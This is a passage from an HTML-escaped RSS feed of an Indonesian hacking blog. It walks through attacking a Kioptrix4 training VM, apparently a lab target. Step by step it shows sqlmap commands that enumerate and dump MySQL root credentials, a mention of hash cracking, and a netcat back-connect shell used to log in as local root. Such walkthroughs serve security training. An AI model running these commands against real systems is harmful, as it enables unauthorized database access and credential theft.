font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie --dbs&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah di atas bertujuan untuk melakukan ekstraksi daftar database yang ada pada web server. Dan hasilnya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ayKsZag7t9o/T6iWZDxJg-I/AAAAAAAABZY/zMfzQLWwZjw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://4.bp.blogspot.com/-ayKsZag7t9o/T6iWZDxJg-I/AAAAAAAABZY/zMfzQLWwZjw/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sebagai informasi, &lt;b&gt;username dan password root mysql selalu terletak pada database mysql&lt;/b&gt;. Maka kita harus menggunakan database ini untuk mencari table dan column yang tepat, dimana username dan passwor root mysql tersimpan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie -D mysql --table&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-9w1KO9Ush24/T6iW3eHKT0I/AAAAAAAABZg/pEtjJwU3Am8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://2.bp.blogspot.com/-9w1KO9Ush24/T6iW3eHKT0I/AAAAAAAABZg/pEtjJwU3Am8/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita berhasil mendapatkan table &lt;i&gt;user&lt;/i&gt; di dalam database &lt;i&gt;mysql&lt;/i&gt;. Selanjutnya kita akan menggunakan table ini untuk melakukan ekstraksi daftar kolom yang terdapat di dalam table &lt;i&gt;user&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie -D mysql -T user --column&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-iKuV8BGyH5o/T6iXUkz7DVI/AAAAAAAABZo/ZssLU0KW3Xg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://4.bp.blogspot.com/-iKuV8BGyH5o/T6iXUkz7DVI/AAAAAAAABZo/ZssLU0KW3Xg/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita berhasil mendapatkan kolom &lt;i&gt;User&lt;/i&gt; dan &lt;i&gt;Password&lt;/i&gt;. Langkah selanjutnya adalah mengekstraksi ke dua kolom ini, sehingga kita dapat memperoleh data di yang tersimpan di dalam ke dua kolom ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie -D mysql -T user --C User,Passwod --dump&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-qnDPs_JfHoE/T6iXxUvzeUI/AAAAAAAABZw/S0Wpee3cjkk/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://3.bp.blogspot.com/-qnDPs_JfHoE/T6iXxUvzeUI/AAAAAAAABZw/S0Wpee3cjkk/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ternyata password mysql tidak diatur oleh web admin. Dalam beberapa kasus, mungkin anda akan menemukan password telah diatur, sehingga anda menemukan password yang terenkripsi. Anda harus melakukan decode hash ini sehingga anda mendapatkan clear text dari hash ini. Untuk melakukan decode hash, anda bisa menggunakan &lt;i&gt;JTR (John The Ripper)&lt;/i&gt;, atau &lt;i&gt;findmyhash.py&lt;/i&gt; yang bisa anda temukan pada backtrack. Anda juga bisa melakukan decode hash dengan bantuan online pada situs-situs yang menyediakan jasa decode hash.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Log In database&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Anda bisa langsung melakukan log in ke dalam database dari terminal, jadi anda tidak perlu menggunakan web shell untuk melakukan hal ini. Basic command dari koneksi mysql adalah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;mysql -u (username) -h (host) -p (password)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh dalam kasus saya&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;mysql -u root -h 10.10.1.128&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-afeQl-NYWY4/T6iY9VGcQyI/AAAAAAAABZ4/FFQGn-fRuKA/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://1.bp.blogspot.com/-afeQl-NYWY4/T6iY9VGcQyI/AAAAAAAABZ4/FFQGn-fRuKA/s320/6.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ada yang aneh. Saya tidak dapat log in ke dalam database. Mungkin ini menjadi alasan mengapa web admin tidak mengatur password root mysql, karena dia telah membatasi IP luar untuk melakukan log in ke dalam database web server. Karena IP saya dibatasi, maka saya akan menggunakan IP web server untuk melakukan koneksi ke dalam database. Bukan melalui proxy, namun melalui OS shell. Saya akan mengendalikan OS shell milik web server, sehingga saya akan dikenali sebagai user local oleh web server. Untuk mengendalikan OS shell, saya menggunakan bantuan netcat. Untuk melakukan hal ini, anda harus membaca turotial&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/back-connect-with-sqlmap.html" target="_blank"&gt;Back Connect With SQLmap&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4Bjuz7SD9bM/T6iZ6q72TPI/AAAAAAAABaA/AaG__Keb540/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://2.bp.blogspot.com/-4Bjuz7SD9bM/T6iZ6q72TPI/AAAAAAAABaA/AaG__Keb540/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dari sini, saya akan melakukan log in ke dalam database web server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;www-data@Kioptrix4:/var/www$ mysql -u root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;Welcome to the MySQL monitor. &amp;nbsp;Commands end with ; or \g.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;Your MySQL connection id is 7243&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;Type 'help;' or '\h' for help. Type '\c' to clear the buffer.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;mysql&amp;gt; show databases;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;show databases;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;+--------------------+&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;| Database &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;+--------------------+&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;| information_schema |&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;| members &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;| mysql &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;+--------------------+&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;3 rows in set (0.00 sec)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Karena pasword root blank, maka saya tidak menambahkan parameter -p (untuk mengatur password saat melakukan log in).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3TKkf7qmrmI/T6iaclb139I/AAAAAAAABaI/x_X35zAnFjY/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://1.bp.blogspot.com/-3TKkf7qmrmI/T6iaclb139I/AAAAAAAABaI/x_X35zAnFjY/s320/9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Cheers. No hard feeling.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-2747033293638184591?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/tricky-log-in-to-mysql.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-Xe2HtsZ-mgQ/T6iTkdh_niI/AAAAAAAABZM/qHKQ_F1wrDU/s72-c/7.png' height='72' width='72'/><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-2632153724629203734</guid><pubDate>Mon, 07 May 2012 09:31:00 +0000</pubDate><atom:updated>2012-05-07T16:31:39.119+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>reverse tcp</category><category domain='http://www.blogger.com/atom/ns#'>netcat</category><category domain='http://www.blogger.com/atom/ns#'>back connect</category><title>Back Connect With SQLmap</title><description>Terinspirasi dari&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/spawn-shell-with-sqlmap.html" target="_blank"&gt;Spawn Shell With SQLmap&lt;/a&gt;, saya menemukan cara yang sedikit nyentrik. Yaitu melakukan back connect dengan shell yang tercipta pada SQL Injection yang dilakukan SQLmap.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Back Connect&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim -&amp;gt; Port Listener -&amp;gt; 